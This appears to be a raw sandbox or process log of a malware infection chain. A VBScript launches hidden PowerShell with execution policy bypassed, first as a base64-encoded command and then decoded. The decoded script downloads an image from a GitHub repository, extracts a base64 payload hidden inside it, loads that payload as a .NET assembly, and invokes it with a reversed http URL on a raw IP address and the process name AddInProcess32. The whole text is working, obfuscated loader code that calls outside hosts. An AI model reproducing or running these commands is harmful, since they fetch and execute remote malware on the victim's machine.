wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\nighttttMPDW-constraints.vbs
316powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd5akxpbWFnZVVybCA9IFlxTGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZWFkcy9tYWluL0RldGFoTm90ZV9WLmpwZyBZcUw7eWpMd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWUnKydudDt5akxpbWFnZUInKyd5dGVzID0geWpMd2ViQ2xpZW50LkRvd25sb2FkRGF0YSh5akxpbWFnZVVybCk7eWpMaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoeWpMaW1hZ2VCeXRlcyk7eWonKydMc3QnKydhcnRGbGFnID0gWXFMPDxCQVNFNjRfU1RBUlQnKyc+PllxTDt5akxlbmRGbGFnID0gWXFMPDxCQVNFNjRfRU5EPj5ZcUw7eWpMc3RhcnRJbmRleCA9IHlqTGltYWdlVGV4dC5JbmRleE9mKHknKydqTHN0YXJ0RmxhZyk7eWpMZW5kSW5kZXggPSB5akxpbWFnZVRleHQuSW5kZXhPZih5akxlbmRGbGFnKTt5akxzdGFydEluZGV4IC1nZSAwIC1hbmQgeWpMZScrJ25kSScrJ25kZXggLWd0IHlqTHN0YXJ0SW5kZXg7eWpMcycrJ3RhcnRJbmRleCArPSB5akxzdGFydEZsYWcnKycuTGVuZ3RoO3lqTGJhc2U2NExlbmd0aCA9IHlqTGVuZEluZGV4IC0geWpMc3RhcnRJbmRleDt5akxiYXNlNjRDb21tYW5kID0geWpMaW1hZ2VUZXh0LlN1YnN0cmluZyh5akxzdGEnKydydEluZGV4LCB5akxiYXNlNjRMZW5ndGgnKycpO3lqTGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNicrJzRTdHJpbmcoeWonKydMYmFzJysnZTY0Q29tbWFuZCk7eWpMbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHlqTGNvJysnbW1hbmRCeXRlcyk7eWpMdmFpTScrJ2V0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChZcUxWQUlZcUwpO3lqTHZhaU1ldGhvZC5JbnZva2UoJysneWpMbnVsbCwgJysnQChZcUx0eHQuNDQ0NDZlc2EnKydiJysnYmJiYmJld21hZGFtLzQzMS44NzEuNjQuODkxLy86cHR0aFlxTCwgWXFMZGVzYXRpdmFkb1lxTCwgWXFMZGVzYXRpdmFkb1lxTCwgWXFMZGVzYXRpdmFkb1lxTCwgWXFMQWRkSW5Qcm9jZXNzMzJZcUwsIFlxTGRlc2F0aXZhZG9ZcUwsIFlxTGRlc2F0aXZhZG9ZcUwpKTsnKS5SZVBsYUNFKCd5akwnLCckJykuUmVQbGFDRSgnWXFMJyxbc3RSSU5HXVtDaEFyXTM5KSB8IGlleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
2136powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('yjLimageUrl = YqLhttps://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg YqL;yjLwebClient = New-Object System.Net.WebClie'+'nt;yjLimageB'+'ytes = yjLwebClient.DownloadData(yjLimageUrl);yjLimageText = [System.Text.Encoding]::UTF8.GetString(yjLimageBytes);yj'+'Lst'+'artFlag = YqL<<BASE64_START'+'>>YqL;yjLendFlag = YqL<<BASE64_END>>YqL;yjLstartIndex = yjLimageText.IndexOf(y'+'jLstartFlag);yjLendIndex = yjLimageText.IndexOf(yjLendFlag);yjLstartIndex -ge 0 -and yjLe'+'ndI'+'ndex -gt yjLstartIndex;yjLs'+'tartIndex += yjLstartFlag'+'.Length;yjLbase64Length = yjLendIndex - yjLstartIndex;yjLbase64Command = yjLimageText.Substring(yjLsta'+'rtIndex, yjLbase64Length'+');yjLcommandBytes = [System.Convert]::FromBase6'+'4String(yj'+'Lbas'+'e64Command);yjLloadedAssembly = [System.Reflection.Assembly]::Load(yjLco'+'mmandBytes);yjLvaiM'+'ethod = [dnlib.IO.Home].GetMethod(YqLVAIYqL);yjLvaiMethod.Invoke('+'yjLnull, '+'@(YqLtxt.44446esa'+'b'+'bbbbbewmadam/431.871.64.891//:ptthYqL, YqLdesativadoYqL, YqLdesativadoYqL, YqLdesativadoYqL, YqLAddInProcess32YqL, YqLdesativadoYqL, YqLdesativadoYqL));').RePlaCE('yjL','$').RePlaCE('YqL',[stRING][ChAr]39) | iex"
2276